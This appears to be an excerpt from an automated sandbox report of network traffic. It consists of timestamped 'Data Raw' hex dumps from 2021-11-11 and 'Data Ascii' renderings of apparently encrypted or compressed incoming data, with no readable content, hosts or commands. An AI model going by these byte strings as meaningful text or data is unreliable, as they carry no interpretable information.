                                                                                                                                                                                2021-11-11 11:27:09 UTC9857INData Raw: b0 72 1f 4e 21 b0 fa 50 ef 54 73 ed 6a 6f 0e 0d 7d af 33 f1 e8 ca aa c3 ea 41 92 6e 3f ba dd c5 61 ec 34 1e b8 5c 75 b0 96 95 c4 4f 08 b8 13 23 2a 6b 0d 5b 09 81 ee 1b dc b6 05 17 2b e0 b7 d3 f3 e7 ab 4e 4f 36 af ab ff 7b 9b 78 53 e0 2e 3f 22 94 4d 3f 93 9f e6 5d d6 bd 8a 44 8e 0a 97 d2 19 6d 02 fe aa 40 05 b8 8b 0a 31 69 c4 a4 83 f5 1f c9 66 a7 f5 15 d2 90 43 08 fa 54 20 e5 78 18 9d d3 e4 20 ff f0 69 74 85 05 9d 7e 5d 50 5f 95 bd 33 96 18 b6 db fc aa b9 84 a0 97 67 2d 10 d4 f2 84 e9 d8 65 ff ab b6 7d f5 92 3e 13 35 74 7d d6 0b 82 86 e4 1d 03 88 5c d7 85 de 6a 4f ef 0c 9a 7e 7d df 9f 1a e5 71 55 7e dd 67 4e 76 f5 10 42 09 40 6a 98 60 21 c4 3e 73 eb 61 79 bb c5 e8 4d 74 b0 dd 93 71 93 81 e6 4c d2 79 26 d4 55 dd e3 7f 3f 4b c6 0e fb ed f3 15 ef b0 71 07 96
                                                                                                                                                                                Data Ascii: rN!PTsjo}3An?a4\uO#*k[+NO6{xS.?"M?]Dm@1ifCT x it~]P_3g-e}>5t}\jO~}qU~gNvB@j`!>sayMtqLy&U?Kq
                                                                                                                                                                                2021-11-11 11:27:09 UTC9858INData Raw: 7a 89 de 8e ad 0d c6 70 f8 a2 e1 c8 17 4c 17 aa 81 d7 cd c4 49 1c 7d 08 71 3e 77 eb a4 00 80 c0 f4 d7 49 0c e5 40 e0 32 7c c1 57 47 63 fe 44 2a c3 06 45 99 0c 62 52 9f d0 a4 b5 94 9e d7 fa 3b f7 17 f4 75 49 12 47 92 53 0e 7e 87 ac 62 57 32 17 41 b7 ae 61 7f 49 3b 25 fa ed 44 c3 99 5e 08 b5 7f a2 9a fe 30 a1 71 f1 e6 15 6d fc 4d 6e b0 d8 49 6a b6 83 69 29 ec 83 99 7d 94 90 f1 12 c8 42 a0 72 6a f2 f9 59 b7 49 e2 67 95 00 88 07 24 78 bf 1e 9f 09 e1 c8 d5 1c da 22 fe 49 84 8e 42 83 f9 cc 54 67 b4 65 54 45 d2 37 a5 b6 b5 5e 70 8d e1 0e a7 7b 1f 6a f8 10 4c f5 c4 de fe 14 ae 16 1d 72 b8 2d 69 7e 1f 5e 0e bf ee 6b 00 6a a9 49 f9 ef fa 13 ea 98 89 96 de 3a b9 19 c9 0f 12 81 d6 6f 28 c3 59 5d 2e 10 9a b4 22 fc 84 87 b8 54 b7 1f 61 b5 cf 93 8d 93 a4 b4 7f dc 22 84
                                                                                                                                                                                Data Ascii: zpLI}q>wI@2|WGcD*EbR;uIGS~bW2AaI;%D^0qmMnIji)}BrjYIg$x"IBTgeTE7^p{jLr-i~^kjI:o(Y]."Ta"
                                                                                                                                                                                2021-11-11 11:27:09 UTC9859INData Raw: 08 b8 c7 5a 7a 41 3f 6e 5e 78 46 b7 91 51 f8 99 88 2b 41 f9 bb 27 1a 7b 70 53 86 bf 4d d6 ea 70 d8 c4 02 4e 5e 61 ce 88 f3 62 0e 2e 1d 61 ca b3 af d0 8c bb a8 43 4e e6 d2 60 8d e1 37 8c 40 9e 93 7f 40 d1 65 b3 e8 2d 35 bf a6 33 7d 52 c5 df 19 3f ad b3 2a f7 df 31 36 74 69 e9 80 c7 6a 31 92 9d b8 98 e7 89 59 e6 f6 30 b7 0d b2 79 cc d1 a0 6f f0 60 7b 76 df 6d 48 93 42 46 5e 32 c1 d5 79 56 70 7d c1 f6 5e 4c 2f b3 49 91 4a ee aa 8f 3f 9f 4b a3 39 4b 8b 61 10 51 bc b4 d6 9e d9 06 e1 d3 c7 92 dd bd 7b 0b 51 df 56 96 e1 51 3d d5 c9 61 54 60 c5 b9 43 e7 f1 49 0d f5 ea 1f 6e 7a b5 e6 d9 31 49 97 e2 a0 cf d1 d4 f7 ca f5 40 12 14 f1 06 f5 81 9f ce 94 69 44 18 19 72 76 39 6e 69 6f 47 14 60 58 69 9e c5 18 0b cd 42 b1 4d 27 56 64 95 30 ac fc ee 68 81 99 6a 95 1d 7b eb
                                                                                                                                                                                Data Ascii: ZzA?n^xFQ+A'{pSMpN^ab.aCN`7@@e-53}R?*16tij1Y0yo`{vmHBF^2yVp}^L/IJ?K9KaQ{QVQ=aT`CInz1I@iDrv9nioG`XiBM'Vd0hj{
                                                                                                                                                                                2021-11-11 11:27:09 UTC9861INData Raw: b0 85 64 15 4f 8a bc 0b 68 a5 08 65 db 99 e5 c9 e9 05 aa 57 d5 9b 43 ff c6 6c 06 74 e1 e7 43 c1 69 d3 94 57 1d 5d 61 47 61 f7 9a 98 b4 c0 88 17 04 95 4d 85 05 b9 b7 cd 69 c8 15 b3 72 86 62 22 97 fe 6e 56 88 ae 47 65 20 1c 55 8a 37 0f 4d 81 21 a8 85 f1 5d 92 b5 99 6f 45 7f 16 81 41 63 e8 2b 2b c7 50 6f 78 89 64 84 a4 d9 bd b9 f3 82 8e 93 a4 f2 bd f1 e2 63 a4 ac eb b5 6d 51 b8 e6 d3 33 ca 48 f1 b9 e4 bf 01 6c 77 62 4b 35 10 8b d6 c4 f5 d5 81 98 d8 b6 d3 22 e8 af 3e 14 f1 77 c5 74 8e b3 c9 63 02 39 9e 15 ea 00 fe c0 da 5a e9 e6 4c b9 f4 51 17 17 9b d2 23 dd 39 05 1c 11 b5 76 06 70 5c 6b ad 69 3a 38 1d 73 08 76 65 85 62 2c b8 1e ea b5 b4 29 e7 6b ae 14 4e 4d 19 01 fa fe 37 4f 37 48 cb a8 05 ab 3c 08 97 b9 c2 f6 76 2a ce 42 5a ce 4e b5 74 61 c6 79 34 1b 81 cd
                                                                                                                                                                                Data Ascii: dOheWCltCiW]aGaMirb"nVGe U7M!]oEAc++PoxdcmQ3HlwbK5">wtc9ZLQ#9vp\ki:8sveb,)kNM7O7H<v*BZNtay4
                                                                                                                                                                                2021-11-11 11:27:09 UTC9862INData Raw: 00 95 a4 87 f4 74 f1 ea 7a 91 b5 02 40 ae ad 78 98 db c0 bc ef c4 6f 52 10 82 75 37 5a cb 01 0f 0a 1d 74 1c 9c 54 84 d2 e1 c1 9f 7f 2e 61 b6 37 5e e9 cd 38 92 e4 4e e7 97 14 87 7c de 75 22 2b db b5 8f 77 1c 82 8e 78 7f 1f 79 47 eb dd 73 5f bc 00 12 52 6f 40 1f 4b 1a 74 0a 89 95 53 9b 6f 29 33 64 85 af b1 05 73 f2 db ed 8f ab e9 8b 70 5d 45 ab b1 bb 6b f1 1a 94 07 19 bd ad 85 df f5 af 72 e8 cc 9f 89 21 34 b8 8d 5a 88 4b 33 32 a0 21 18 cf a9 aa 50 09 1e 51 7d 69 42 ae 73 4d 2c ca 84 e8 40 66 31 dc 13 76 00 59 8c 86 91 e1 f7 fe 55 64 33 8a b8 d1 1f 75 b1 7a 37 e6 10 13 fd c3 ad 2c 4b f6 d7 07 35 4e e8 f8 60 95 b2 21 95 13 e6 b7 a0 f2 65 b9 c8 62 ed d6 98 d2 f1 2b a1 72 ae 2c 0d 2e 0d c2 c6 aa fc 91 9a 3f 61 69 d8 06 e4 d7 b9 8a 0a a9 a5 16 fc 4d be 57 df f9
                                                                                                                                                                                Data Ascii: tz@xoRu7ZtT.a7^8N|u"+wxyGs_Ro@KtSo)3dsp]Ekr!4ZK32!PQ}iBsM,@f1vYUd3uz7,K5N`!eb+r,.?aiMW
                                                                                                                                                                                2021-11-11 11:27:09 UTC9863INData Raw: 07 1c ab d9 53 5c 4f 49 1a a3 c4 1b a7 44 e7 3d 32 49 93 90 e9 64 6a 9f 3c 5d 47 34 13 4d 6f f4 1c 5a 04 74 25 8d 20 96 6b 0b 7c 28 55 ce 8c 36 c7 4e 6f 27 54 27 42 60 41 b6 1b 4f f8 a4 c8 ce 7b fa 7f fc 53 dc 4a 0b 60 b9 4a ce 7d a9 4b e4 b8 98 10 d1 e6 17 a9 5c 09 55 4a da e5 0a 7a 33 e4 85 4b 68 2f c1 91 ca 31 1f 01 63 d1 fa cd a6 10 8b 82 51 45 a5 61 0c c7 bd 71 36 82 9d 0e 73 0a a3 ab b8 56 63 94 84 6e a4 06 ea b2 6e 0f e3 e5 1c e4 5c e2 1e d1 06 2c c4 12 a8 ed ba 3f 0e f3 89 41 00 97 4c f2 5e 74 c1 48 7f 3a f2 be 1b d2 ba 4f e0 b0 55 d6 41 65 1a 6e 96 13 eb 0d 72 58 50 13 27 e1 32 15 f8 17 b9 40 c0 68 87 da 5b 94 ab f6 8a 26 c4 b5 85 81 dc ad c7 d7 b9 e4 d5 2d d7 fb 5a 77 ae ff b0 e9 96 f3 d5 5e 6d 76 1b 6e 2d bb 44 24 f1 be 2a 64 77 b7 83 48 a2 34
                                                                                                                                                                                Data Ascii: S\OID=2Idj<]G4MoZt% k|(U6No'T'B`AO{SJ`J}K\UJz3Kh/1cQEaq6sVcnn\,?AL^tH:OUAenrXP'2@h[&-Zw^mvn-D$*dwH4
                                                                                                                                                                                2021-11-11 11:27:09 UTC9864INData Raw: 62 6f bc 98 d8 72 ae c6 6d 37 6c 63 8b 5e 8a 88 fc 8c 74 b9 65 45 3d 9f 19 12 a4 df 26 32 58 96 11 62 a8 87 90 72 1c 02 e5 88 e0 a1 6b b3 ab 70 29 24 8c df 8e ac 47 8f cc 06 8e 69 f7 04 af 6d da f0 2e 60 fa 8c 0e 70 4b 72 76 cd 6c 7d 14 98 85 5e 62 91 06 2d 02 44 a9 ce c4 a1 eb 20 10 04 79 5d b9 90 15 b7 34 5d 17 b2 fc 61 d5 21 fb 60 65 f6 6a 20 e1 b2 2e 46 cf 0b f2 69 e9 c6 43 65 d9 87 97 d1 4c 78 86 84 f5 08 b9 cf 2b 1b ba 8a d0 a3 b8 12 23 95 e7 87 76 77 e7 ba b1 c4 0b 57 8a ad d8 86 e2 88 e6 62 9b 78 d9 55 a7 ee f2 c0 52 80 2a 9f 4c e6 d2 2a 09 6f cf a1 c2 2f f5 8c df 97 59 a5 a5 ce c2 e1 d7 d4 ec 90 28 80 3c 17 4a 69 d9 5f 4d b4 c5 ce 2b 92 c0 67 cc e9 fe b2 9d d4 b0 01 92 b9 f6 89 4c ae 81 2a e5 1d 93 8d 68 10 78 db 61 05 5b 39 df 43 91 02 ad 74 37
                                                                                                                                                                                Data Ascii: borm7lc^teE=&2Xbrkp)$Gim.`pKrvl}^b-D y]4]a!`ej .FiCeLx+#vwWbxUR*L*o/Y(<Ji_M+gL*hxa[9Ct7
                                                                                                                                                                                2021-11-11 11:27:09 UTC9866INData Raw: 3c 99 49 22 47 b4 09 e4 73 77 50 f2 2a 47 7e fe b0 42 31 36 28 43 dd af d9 80 14 c3 b5 2e ac 7c ea 19 6e 8c 14 ea 65 74 6c e3 14 c5 6f f8 5e 18 0f 5e 1e 23 fd 8c e2 3e aa 65 09 b9 1e e0 31 68 2a a0 6d 50 7e bc 55 c9 1a b6 d2 e7 46 45 3d ed 62 50 17 37 4f a1 66 4f bc 63 80 fc 3e ee e5 a9 ce 01 f6 87 ee f9 f5 c5 4c 79 72 53 d3 41 39 e3 46 4e 0a de e3 d7 71 e4 52 7b 67 c1 f1 62 23 1a 71 37 dd c1 e6 f1 7e fa 07 f6 a1 c1 49 7d 69 1e 03 d8 a5 1a c5 bc 53 b9 f7 11 ba c3 2b 1f 64 6f bd 86 96 bd 28 9f 3b ef 7a 92 de 0b 45 8d 55 14 81 c2 78 62 14 0d 68 20 a6 67 84 08 99 ac 26 ea 7c 45 66 95 7c c5 be 99 0d a9 8b 78 db af 7f 04 18 c5 58 55 ec 80 f9 5d cf bd 54 5e 09 5c 63 e1 a8 37 b8 1b 3b e6 5a a6 0a ca d7 0c 97 1f 39 be 4d d1 df 0d e8 4a fa 24 b9 4e f4 fd bb f2 d7
                                                                                                                                                                                Data Ascii: <I"GswP*G~B16(C.|netlo^^#>e1h*mP~UFE=bP7OfOc>LyrSA9FNqR{gb#q7~I}iS+do(;zEUxbh g&|Ef|xXU]T^\c7;Z9MJ$N
                                                                                                                                                                                2021-11-11 11:27:09 UTC9867INData Raw: af c5 15 a0 22 e1 49 37 de e1 a9 16 bc e6 44 82 37 4e b9 96 68 b1 f0 97 75 46 08 5a c3 71 b5 30 7e 51 66 52 7c 44 c4 f6 6e 6f 42 57 b0 3e a2 13 6e a5 77 b4 80 92 18 64 32 78 8c b9 ed d8 62 a0 ca 72 5d e2 65 c4 87 90 bf e1 eb 97 6d 61 64 cb fa af 92 fc f6 6c ea 7f 31 6a 58 f3 99 df 9a 65 37 ad 81 56 ae 04 f3 62 23 4a 79 0d 49 6a 86 33 f7 4a e6 f6 29 58 ea a8 4d e2 7e 06 a8 18 20 36 2e ca eb 69 4f 72 a1 fc 1e fb 37 b2 36 7f b7 9d 90 11 db 07 31 95 fd c7 23 57 51 39 bd fc 1b 11 5b ad 89 14 9e 78 61 49 be 41 b6 7a 2b 71 f1 1a 8e e4 82 3b b1 f5 b0 6f b3 09 b5 e4 c8 ed b8 0d a7 80 99 56 0d 77 d2 48 20 f9 94 28 66 25 58 1b dd e4 84 a4 79 77 e6 38 6e 76 fa 35 e4 37 5b 10 8f d0 d9 f0 e8 7d 91 8c ec 99 26 b1 8d 68 94 b1 24 f8 6c 6a 4e 00 63 ae 58 4a bb 3b 00 e8 78
                                                                                                                                                                                Data Ascii: "I7D7NhuFZq0~QfR|DnoBW>nwd2xbr]emadl1jXe7Vb#JyIj3J)XM~ 6.iOr761#WQ9[xaIAz+q;oVwH (f%Xyw8nv57[}&h$ljNcXJ;x
                                                                                                                                                                                2021-11-11 11:27:09 UTC9868INData Raw: 25 65 71 35 a4 f9 7b 8a f5 14 c3 48 b3 04 17 7f 15 e9 a5 b6 d1 dd 26 88 92 29 0b a7 7b 0c 05 46 8a 39 69 a8 ee f9 7f 2e 2a da 7a ce 09 cf 50 e1 43 bc 69 7d 39 f4 01 61 77 03 41 c2 7c aa fc e6 6c 88 44 8f 86 e6 be 2c 72 98 ab 95 ed b0 2a e1 30 dc e3 e2 3f 25 51 f1 fc 5e a0 75 01 fb 62 c8 d6 47 ad a3 e4 fe 7f 96 7a 9a 1d 1f 24 f0 f0 e6 eb 61 34 45 7e 16 f8 12 4f 23 97 d4 e5 c2 08 a4 50 9b 53 ac 69 4a 70 b7 d1 a1 1d 03 f0 3f d0 ef d5 e6 49 24 4c 29 75 e3 6e 66 06 a8 55 82 38 33 7c e2 7d 3a ef 59 bd 90 07 e8 61 b7 e1 f9 73 67 7b c2 1a 4b 95 bf b7 af f5 18 29 ea ec a2 7f ef 9d 91 83 f7 08 2c be eb c0 a8 b7 b5 9a b8 eb 48 14 0f 34 f9 71 a1 97 c0 93 77 f8 39 01 a2 f8 b5 15 6c 57 ee 69 63 90 ce 1a 42 a9 45 45 85 b0 fc 12 2c 90 83 9c 04 58 55 e9 2a 30 29 73 4a 62
                                                                                                                                                                                Data Ascii: %eq5{H&){F9i.*zPCi}9awA|lD,r*0?%Q^ubGz$a4E~O#PSiJp?I$L)unfU83|}:Yasg{K),H4qw9lWicBEE,XU*0)sJb
                                                                                                                                                                                2021-11-11 11:27:09 UTC9870INData Raw: bd 3f fd cb 37 89 8a 54 89 5b c8 a1 3e 3b 43 81 9e d6 42 e5 92 46 08 19 f7 77 e8 6a cb 08 84 a6 83 47 23 a3 91 46 d3 7d 4b 4a 4f 45 92 04 60 b1 ec a7 4e 13 7e 57 ba 51 98 d8 51 34 ff e0 88 f5 ca 2f 1e 8e 32 7e e6 a1 14 67 51 40 cd 29 8b 9c d1 d2 22 d3 91 ea cf 49 4c 9e 98 73 4c c1 8f 9d aa 10 a3 33 c0 09 e1 dd 08 fe f2 ce c1 d6 28 a5 f4 58 29 9c e1 24 91 4c da 51 d6 81 6f 1a e7 09 32 42 fa ab 08 e7 d8 54 42 5e a1 ba ef 4d ab bc a2 ae 77 92 46 57 e4 d8 60 42 03 21 b4 b4 b9 d0 12 1f a7 2c b6 62 56 2b 83 c6 e1 65 91 87 53 ba c6 f1 2a a4 59 d7 59 ab 0b 2f 7e 73 62 2f 06 6e e9 a9 6d 65 6b 09 b7 50 51 41 99 ab 69 bf ee f5 df 69 06 70 c2 ba 15 4f 6a 49 66 08 eb ff 94 e0 fb 8f 4f 63 c9 5e 28 a9 5c 97 67 d5 06 de 3f 3c 7b 2e 33 96 2f 53 4a 59 2f ea e6 1a 6b 44 96
                                                                                                                                                                                Data Ascii: ?7T[>;CBFwjG#F}KJOE`N~WQQ4/2~gQ@)"ILsL3(X)$LQo2BTB^MwFW`B!,bV+eS*YY/~sb/nmekPQAiipOjIfOc^(\g?<{.3/SJY/kD
                                                                                                                                                                                2021-11-11 11:27:09 UTC9871INData Raw: 97 60 70 05 73 47 56 cb a7 b8 df 49 21 5a 61 ed 97 ad 51 42 b0 6c 0a 7e 8e 03 41 01 b2 e5 1e c2 0e eb df fd 58 bc 29 d8 fa d5 a1 e9 0a f0 21 a6 2a 22 4b c1 16 fa 55 9f f7 27 a7 8d f5 7e 7a c1 db e5 77 c9 7e be ec a9 18 36 b2 b2 f5 05 7b 61 bd ca 11 69 2f e2 79 87 3f 8c 76 d8 fe 06 ba 52 99 51 7d 53 52 7e 5e df f8 eb 62 66 7d a7 01 ce f1 e7 42 d4 80 b2 79 c1 73 fa 61 2a 65 f1 03 df 60 6b 75 28 30 92 4a 7d 2a 90 95 96 bf 1e 28 bc f0 26 13 5f 68 a4 6b d7 40 8f 97 26 42 c4 97 a3 8b 23 e2 29 44 1e b6 e9 32 af a7 4c f1 2a af c9 7a 27 d5 67 50 88 09 b5 87 86 f9 a1 a7 26 72 bf 4c 36 f0 e9 9f 2e 6a e9 fc b6 be 81 41 51 a8 5d 12 2e 73 e1 bf 2e 1e 81 ad c5 9d 19 22 5a 65 49 77 4b a4 49 2b 5c b2 21 30 26 62 c1 72 86 e0 f5 71 d6 2e a9 bf 3c 5f 66 ad 5d 0d 4d 45 3b 27
                                                                                                                                                                                Data Ascii: `psGVI!ZaQBl~AX)!*"KU'~zw~6{ai/y?vRQ}SR~^bf}Bysa*e`ku(0J}*(&_hk@&B#)D2L*z'gP&rL6.jAQ].s."ZeIwKI+\!0&brq.<_f]ME;'
                                                                                                                                                                                2021-11-11 11:27:09 UTC9872INData Raw: ef a4 99 a4 6a 01 10 89 a6 3a fe cf 17 64 5c ae b6 d7 85 fd 7b ba 3d 92 38 06 89 06 99 0c e4 7f dd 61 61 a6 ef 70 2f 11 a2 24 2b dc 7e 6f af a0 a5 40 50 cf e1 83 8e 93 33 ab b0 e1 34 8c 87 40 71 f4 50 c0 98 d7 8c 15 30 16 2d 17 34 65 85 da 41 c9 8d 11 ec 95 d1 b0 b6 94 49 0f 88 5c 6d 4c ab 30 88 9d 91 43 f9 a8 c1 38 5d f5 e3 9b 9c ed bc f8 b4 b8 f2 3d 40 a8 36 93 48 5f ae 14 9f 4c ee 2c 6c ed 02 2e 91 3f 21 61 3f 25 de 70 cd 74 8d 41 26 97 19 a8 6a 04 6a 84 da 20 ae 3e 91 7e 51 12 a2 ad bc d8 6e 6b fe 53 ca c2 06 9e 1f 01 cf 76 05 77 4f f1 8a 68 db 0a 0c 49 29 9d e9 97 ca e0 29 6c 3a e9 0e 93 98 ab c1 61 44 63 29 53 2e 53 9a df ef 9f a4 37 89 77 e9 1b 18 1f f6 56 7b 75 7e 06 33 95 a8 28 b7 24 d0 f0 a4 7f 8a 37 33 a7 b0 43 2c 72 e1 d2 36 68 8c ef f4 48 76
                                                                                                                                                                                Data Ascii: j:d\{=8aap/$+~o@P34@qP0-4eAI\mL0C8]=@6H_L,l.?!a?%ptA&jj >~QnkSvwOhI))l:aDc)S.S7wV{u~3($73C,r6hHv
                                                                                                                                                                                2021-11-11 11:27:09 UTC9874INData Raw: 1e 61 ef e2 ba da 8b 04 64 80 c4 85 d0 17 4d d0 75 0d b7 b4 eb 9d be c0 0e c4 29 dd 7a d3 74 c0 26 6b d2 d3 bf bd c6 ce c9 e4 c6 a8 b6 c1 0e 9f 9f df 9e 6f 51 b8 0b cb 4c 51 b3 eb f9 78 e1 d5 32 47 ff 26 5d e4 88 d0 43 be b7 b5 a4 e5 35 5f 6e e9 c9 90 fa 7e 9b 54 0d 84 9b eb 6a 8c ef a5 ed 89 02 62 c1 12 6e 94 91 fc a8 b5 69 69 cb ba 37 e4 1e 88 57 78 3b 26 70 8c 51 b6 69 3c ee 2a 4a 1d 70 84 80 2d 96 be e8 5f c9 ed d9 9d 78 84 95 ea 6f 5c d4 68 75 56 fb f8 38 ea 5c cf 4c e8 a4 fb 7f b8 09 f8 67 90 5e ea 60 b1 e5 91 01 59 2f 21 aa 0c 37 8d c9 9c b0 b9 b2 87 5e 10 8b 8f 77 79 26 e9 de d2 15 71 1c c6 92 6e 10 a2 26 b0 09 8c 70 1f 5c 9e 09 90 aa 05 95 8b 6b 69 b3 4e 72 44 b4 b3 84 f6 5f b1 42 34 35 d5 39 a7 79 78 d7 80 6e 4f 37 f3 b3 b1 97 dd 5d ea ec 9c a9
                                                                                                                                                                                Data Ascii: adMu)zt&koQLQx2G&]C5_n~Tjbnii7Wx;&pQi<*Jp-_xo\huV8\Lg^`Y/!7^wy&qn&p\kiNrD_B459yxnO7]
                                                                                                                                                                                2021-11-11 11:27:09 UTC9875INData Raw: 5a 55 61 46 3a 82 3c b8 63 f9 81 81 1d 61 87 dd 1d 63 b0 1a 33 b7 52 a2 43 29 bf 3e fd 87 36 02 a5 d9 f6 67 ab 7b 53 29 b1 40 78 3e b5 be 88 c5 15 6a 08 c5 f5 6f 9a 06 c3 65 e9 93 e2 25 c6 ea dd 5d 51 a2 a1 e1 43 64 31 f5 e1 89 2f 27 89 8d fd 0f 19 06 49 48 43 85 c3 7d dd e1 37 5b be 3c dd 17 c4 99 e5 84 45 9d 7d f5 09 5a 85 df 3c 90 a1 20 9a 0a 1b 3d 2a cd e6 a0 2c c2 5b 53 a1 25 ec 13 3c ed 22 a3 40 cc 53 7d a0 e7 53 5b 91 b7 53 45 21 6d b1 6b 24 d5 79 79 85 f0 9f 90 34 73 07 3b ef ea 0d 58 40 79 77 c7 ae 1a 5c c3 ab df 75 33 46 3e 6a b6 2f ff 79 28 ca d2 52 59 fe a2 42 90 38 69 ca b4 cf 75 ab 49 1c d5 bf 3f 01 2b d8 dc cd e4 26 cc ea e7 09 d5 79 bd 2a bd 3e df 0d b3 67 2d 45 ea f4 97 9e e7 b3 9f 6a a4 62 53 5e 14 fe 95 50 ae 2e 3b 4e 3a d6 37 86 32 25
                                                                                                                                                                                Data Ascii: ZUaF:<cac3RC)>6g{S)@x>joe%]QCd1/'IHC}7[<E}Z< =*,[S%<"@S}S[SE!mk$yy4s;X@yw\u3F>j/y(RYB8iuI?+&y*>g-EjbS^P.;N:72%
                                                                                                                                                                                2021-11-11 11:27:09 UTC9876INData Raw: db ef 44 9b 4b 83 f0 25 38 de 0f 83 db 94 28 ea 2b 97 13 1c a8 da 75 fb 71 2e d1 28 5a 8d 22 2f d3 52 a0 cd 52 48 fa 8b eb 9a 1b 3d be bd 28 78 fd 08 5e fb 0c b0 46 ee bf 81 48 d1 34 b0 8c 81 f5 b8 f5 bf e9 ea ad 19 4f 7f 4b 7d 56 1b 57 3f 68 b5 f0 b2 38 88 6d 7f d3 8c b4 85 e0 b2 d4 f9 55 b2 a9 fd 23 e2 a4 a2 8f c5 47 ac 3b 7a 82 81 70 ab fe 2f f4 8e 39 1f 32 8a 4d 67 b4 fe d5 0d 5a 86 a5 50 7d e8 72 fb f4 3c 60 95 51 a0 e8 57 85 90 fd 6f 70 55 ad 8c 7b f3 75 54 30 6d 9a a9 4a 84 f1 9a ac f2 8f 1d 9b c3 ad ed cb 0a 33 de 70 e0 e1 ff cd 91 76 6c f6 ce 5f 1e d3 48 95 41 f0 b6 bc ea a3 72 be 20 70 b4 88 f0 60 fe d6 7d 46 56 d5 1c 84 ae 38 6a 9d 3f dd 1b 59 b0 b3 e7 e3 3c ad b3 98 f1 0e bf b7 66 7e 67 36 57 76 b5 70 ae 75 93 f5 f7 d2 f2 5a 08 a9 95 50 3c 59
                                                                                                                                                                                Data Ascii: DK%8(+uq.(Z"/RRH=(x^FH4OK}VW?h8mU#G;zp/92MgZP}r<`QWopU{uT0mJ3pvl_HAr p`}FV8j?Y<f~g6WvpuZP<Y
                                                                                                                                                                                2021-11-11 11:27:09 UTC9878INData Raw: 96 18 5d 12 ed a5 09 35 73 09 86 68 3d b6 df 56 fd 7c b9 b4 b5 a4 af 91 1c 49 e1 2c 55 15 aa 67 e8 0b 11 d1 ff 15 e9 a7 6b 85 e2 de 16 c8 c1 58 70 1f 2c 3c fd 51 6e a3 14 53 85 46 3f 3e e0 31 82 ae 99 8f e8 8d d3 66 5b 63 a0 bb 26 60 a8 77 46 56 63 bb b7 1a e1 5f 39 11 09 b9 4d 58 dd d0 4a ec 3e 6f c2 34 28 bb 4d 89 f1 b8 6e 65 b8 9d 8b 89 ae 56 2b 81 00 45 28 74 d0 b8 a0 f8 bc 4f 0a 1b fa fa 27 60 a5 0d 10 6f d9 09 b6 27 d8 f1 5c 5b 1d c9 14 c9 19 a0 94 95 56 e0 00 64 69 c3 21 4e c2 24 05 e2 ee ad 8f bf 83 ad 9e 99 66 63 aa 5b ff a7 af 74 b8 8b 86 3f a7 30 dd 7a 68 5b 03 97 c1 2d a9 81 81 32 39 5f 5a d8 e9 1f 9d c9 8f ca f0 b3 89 40 a1 c5 85 fc 7a 59 cd 0a ce aa 2d 6d ec 06 c4 31 5e 84 4e 76 9e d3 a7 da fd 1b 65 47 c7 fa 0d cf 44 a6 60 61 b8 9b b9 35 79
                                                                                                                                                                                Data Ascii: ]5sh=V|I,UgkXp,<QnSF?>1f[c&`wFVc_9MXJ>o4(MneV+E(tO'`o'\[Vdi!N$fc[t?0zh[-29_Z@zY-m1^NveGD`a5y
                                                                                                                                                                                2021-11-11 11:27:09 UTC9879INData Raw: 69 48 6a 98 65 d8 96 8c 0f d6 c8 2d d5 64 16 51 6b 20 d4 d2 a6 cc 94 68 8c bf 77 b4 38 c0 9a 55 c9 46 f8 6b c3 34 e6 20 af b2 47 39 3b cd 32 35 ac bd 5a 73 e5 a6 73 8b ec ed ba 6c 39 04 c2 1f 4b 8b 81 2a 0b 34 84 07 51 9a 48 4e 1b dc eb 38 42 d4 37 16 ae 94 73 14 aa 5a e6 6d 8e 9f c0 aa 75 eb 6d 23 ad 38 39 f6 d7 7b 57 db a1 a4 03 fb 57 b8 6a 2a 4d 14 a7 c4 5d 5b b7 29 ad a7 a3 5f 22 a4 d0 73 83 7a ca 77 a5 fa 9e af 65 05 78 e0 f2 30 5b 2b e8 98 fe e7 0a c7 0e 3f a9 47 68 32 77 df 10 ce 01 bd c1 7d 77 28 74 12 56 1a 1b a8 fd ec 32 f3 2c c5 71 5c 4c ad 6b 32 a9 28 25 73 9d 20 9e 87 6b e5 45 aa a3 df 49 a2 7c 92 f2 ac ea b7 73 a3 a4 6f 5a 0f d0 10 5d 7a 0e 69 10 3e eb ac 07 6b 69 54 7b 3b 65 3b 1e db b8 38 a8 ca 73 31 37 aa 65 78 71 fe ab 46 31 df cf 07 d8
                                                                                                                                                                                Data Ascii: iHje-dQk hw8UFk4 G9;25Zssl9K*4QHN8B7sZmum#89{WWj*M][)_"szwex0[+?Gh2w}w(tV2,q\Lk2(%s kEI|soZ]zi>kiT{;e;8s17exqF1
                                                                                                                                                                                2021-11-11 11:27:09 UTC9880INData Raw: 59 55 4d 65 9e bf 0e c9 69 b3 8b 41 45 39 82 68 56 95 33 bc 61 54 8d 13 17 e8 db 43 6e 6a 62 2c fd cc 3b 4d 0b 55 e9 e4 b3 49 de d1 dd f0 33 ad 05 02 a4 e7 72 55 23 a0 31 39 3d dd cc 25 b8 47 16 0b 3a 80 a5 09 67 f0 e1 5f 15 82 d5 e0 4f 32 9c c1 68 d7 97 3b 81 a9 a6 55 7b 42 a2 47 f5 68 5a f4 d9 7d 86 35 b8 ec 6a 5b 82 f1 5c ff 73 75 f9 c2 40 15 91 02 b5 bb 9a 00 04 eb 1f 73 2e d1 0a 54 06 30 6d 24 3b 45 28 7b 8d 1e 2f be ef 32 5a 6a 91 e8 ef ef 87 fa 36 77 d3 55 69 68 e7 2e eb 9b 6c 20 c2 6d f5 25 c6 c7 11 86 b6 21 f8 4d 53 57 39 06 18 c0 3b 9c 81 35 36 92 b0 79 36 19 a2 9b 04 35 fe 79 60 71 43 81 bf 70 20 55 82 23 22 d7 d5 39 fe e9 3a 82 a3 45 d0 23 43 96 86 74 0d f5 cb 0f 6e a4 6f 12 27 a9 d2 4d ac d8 90 10 24 04 ba af 8c f1 ca 0e c2 77 b2 84 c4 3d 12
                                                                                                                                                                                Data Ascii: YUMeiAE9hV3aTCnjb,;MUI3rU#19=%G:g_O2h;U{BGhZ}5j[\su@s.T0m$;E({/2Zj6wUih.l m%!MSW9;56y65y`qCp U#"9:E#Ctno'M$w=
